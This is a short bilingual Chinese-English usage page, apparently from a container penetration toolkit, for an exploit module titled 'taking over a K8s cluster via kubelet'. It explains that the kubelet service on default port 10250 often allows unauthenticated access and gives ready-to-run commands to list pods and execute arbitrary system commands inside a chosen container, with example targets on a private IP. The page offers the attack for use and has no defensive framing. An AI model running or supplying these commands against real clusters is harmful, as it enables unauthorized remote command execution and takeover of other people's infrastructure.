利用kubelet接管K8s集群

Exploit: kubelet-exec

Use the default ‘10250’ port ‘kubelet’ service to list pods running in the cluster.
By default, unauthorized access is supported. The token can be entered optionally.

利用默认10250端口kubelet服务列举集群中运行的pods，支持指定pods执行系统命令并回显。
默认支持未授权访问利用，token可选择性填写。

Usage

./cdk run kubelet-exec (list|exec) <endpoint>/<namespace>/<pod>/<container> <token>

Example

./cdk run kubelet-exec list http://172.16.61.10:10250
./cdk run kubelet-exec exec https://172.16.61.10:10250/kube-system/test1/test "ip addr"